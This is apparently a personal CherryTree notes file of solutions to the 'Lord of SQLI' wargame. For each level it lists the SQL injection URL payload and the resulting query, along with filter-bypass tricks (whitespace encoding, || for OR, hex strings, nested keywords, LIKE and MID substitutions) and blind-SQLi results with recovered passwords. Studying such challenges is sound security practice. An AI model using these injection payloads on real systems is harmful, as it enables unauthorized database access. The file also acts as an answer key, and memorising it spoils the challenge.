<?xml version="1.0" ?>
<cherrytree>
	<node custom_icon_id="0" foreground="" is_bold="False" name="Lord of SQLI" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1595679759.39" ts_lastsave="1595679852.77" unique_id="1">
		<rich_text></rich_text>
		<node custom_icon_id="0" foreground="" is_bold="False" name="1. Login" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1595679852.77" ts_lastsave="1595679854.21" unique_id="3">
			<rich_text>' OR 1=1

lol</rich_text>
		</node>
		<node custom_icon_id="0" foreground="" is_bold="False" name="1. Gremlin" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1595680481.1" ts_lastsave="1595681470.99" unique_id="4">
			<rich_text>URL Solution: ?pw=' OR ''= '

QUERY: select id from prob_gremlin where id='' and pw='' OR '1'= '1'</rich_text>
		</node>
		<node custom_icon_id="0" foreground="" is_bold="False" name="2. Cobolt" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1595681074.25" ts_lastsave="1595681465.16" unique_id="5">
			<rich_text>URL: ?pw=') OR ( id = 'admin

QUERY: select id from prob_cobolt where id='' and pw=md5('') OR ( id = 'admin')</rich_text>
		</node>
		<node custom_icon_id="0" foreground="" is_bold="False" name="3. Goblin" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1595681441.92" ts_lastsave="1595682131.46" unique_id="6">
			<rich_text>URL: ?no=no OR 1=1 ORDER BY id

QUERY: select id from prob_goblin where id='guest' and no=no OR 1=1 ORDER BY id

---

URL: ?no=0 or id=0x61646d696e

QUERY: select id from prob_goblin where id='guest' and no=0 or id=0x61646d696e
</rich_text>
		</node>
		<node custom_icon_id="0" foreground="" is_bold="False" name="4. Orc" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1595682469.82" ts_lastsave="1596902666.15" unique_id="7">
			<rich_text>Using the ‘or’ operator and SUBSTR method Blind-SQLI can be executed to gain info:
The passwords length is 8 characters.
Script attached

URL: 095a9852

QUERY: select id from prob_orc where id='admin' and pw='095a9852'
</rich_text>
		</node>
		<node custom_icon_id="0" foreground="" is_bold="False" name="5. Wolfman" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1596287227.4" ts_lastsave="1596287404.82" unique_id="8">
			<rich_text>URL: ?pw=%27or%0Aid=%27admin

QUERY: select id from prob_wolfman where id='guest' and pw=''or id='admin'

The challenge in this case was to encode the whitespaces with %0A
</rich_text>
		</node>
		<node custom_icon_id="0" foreground="" is_bold="False" name="6. Dark Elf" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1596287446.76" ts_lastsave="1596287463.89" unique_id="9">
			<rich_text>URL: ?pw=%27%20||%20id=%27admin

QUERY: select id from prob_darkelf where id='guest' and pw='' || id='admin'

Introducing || to mark OR
</rich_text>
		</node>
		<node custom_icon_id="0" foreground="" is_bold="False" name="7. Orge" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1596287931.43" ts_lastsave="1596902688.85" unique_id="10">
			<rich_text>URL: ?pw=7b751aec

QUERY: select id from prob_orge where id='guest' and pw='7b751aec'

Solvable using the script from orc, after modifying OR, AND
Script attached</rich_text>
		</node>
		<node custom_icon_id="0" foreground="" is_bold="False" name="8. Troll" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1596288273.99" ts_lastsave="1596288527.64" unique_id="11">
			<rich_text>URL: ?id=admIn

QUERY: select id from prob_troll where id='admIn'

SQL is not case sensitive!!

</rich_text>
		</node>
		<node custom_icon_id="0" foreground="" is_bold="False" name="9. Vampire" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1596288689.74" ts_lastsave="1596288943.44" unique_id="12">
			<rich_text>URL: ?id=adADMINmin

QUERY: select id from prob_vampire where id='admin'

Blacklisting is shit

</rich_text>
		</node>
		<node custom_icon_id="0" foreground="" is_bold="False" name="10. Skeleton" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1596288959.64" ts_lastsave="1596288969.93" unique_id="13">
			<rich_text>URL: ?pw=%27or%20id=%27admin%27%20or%20%27%27=%27

QUERY: select id from prob_skeleton where id='guest' and pw=''or id='admin' or ''='' and 1=0


</rich_text>
		</node>
		<node custom_icon_id="0" foreground="" is_bold="False" name="11. Golem" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1596289109.33" ts_lastsave="1596902698.08" unique_id="14">
			<rich_text>URL: ?pw=77d6290b

QUERY: select id from prob_golem where id='guest' and pw='77d6290b'

Another Blind SQLi
Losers say:
- replace = with NOT x &lt;&gt; y
- instead of SUBSTR with LENGTH to find the length and LIKE to create the query

winners say:
- replace = with LIKE
- replace SUBSTR with MID 

Script attached</rich_text>
		</node>
		<node custom_icon_id="0" foreground="" is_bold="False" name="12. Dark Knight" prog_lang="custom-colors" readonly="False" tags="" ts_creation="1596294370.39" ts_lastsave="1596902708.71" unique_id="15">
			<rich_text>URL: ?pw=0b70ea1f

QUERY: select id from prob_darkknight where id='guest' and pw='0b70ea1f' and no=

Another Blind SQLi
- “no” inject parameter like in Goblin
- replace ' with &quot;

Script attached</rich_text>
		</node>
	</node>
</cherrytree>
